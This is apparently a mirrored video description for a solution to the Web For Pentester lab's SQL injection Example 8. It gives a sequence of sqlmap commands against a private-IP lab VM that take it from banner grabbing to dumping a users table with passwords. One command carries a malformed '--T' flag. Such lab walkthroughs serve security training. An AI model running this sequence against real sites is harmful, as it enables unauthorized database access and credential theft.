Web For Pentester SQL Injection Example 8 Solution | sqlmap

Publicado el: 04 septiembre 2018
en el canal de: Shahzad Haxor
1,382
7

Web For Pentester SQL Injection Example 8 Solution | sqlmap.

The SQL injection attack exploits common design flaws in web applications and continues to be an easy and effective method of cyber attack.

Commands :
Grab Banner :-
python sqlmap.py -u "http://192.168.174.133/sqli/example8.php?
order=name`*" --banner --batch

Database :-
python sqlmap.py -u "http://192.168.174.133/sqli/example8.php?
order=name`*" --banner --batch --dbs

Tables :-
python sqlmap.py -u "http://192.168.174.133/sqli/example8.php?
order=name`*" --banner --batch -D exercises --tables

Columns :-
python sqlmap.py -u "http://192.168.174.133/sqli/example8.php?
order=name`*" --banner --batch -D exercises --T users --columns

Extract Data :-
python sqlmap.py -u "http://192.168.174.133/sqli/example8.php?
order=name`*" --banner --batch -D exercises -T users -C age,groupid,id,name,passwd --dump


IF YOU LIKE THIS VIDEO. PLEASE DON'T FORGET TO LIKE SHARE AND SUBSCRIBE OUR CHANNEL.

THANKS FOR WATCHING.


En esta página del sitio puede ver el video en línea Web For Pentester SQL Injection Example 8 Solution | sqlmap de Duración hora minuto segunda en buena calidad , que subió el usuario Shahzad Haxor 04 septiembre 2018, comparta el enlace con amigos y conocidos, en youtube este video ya ha sido visto 1,382 veces y le gustó 7 a los espectadores. Disfruta viendo!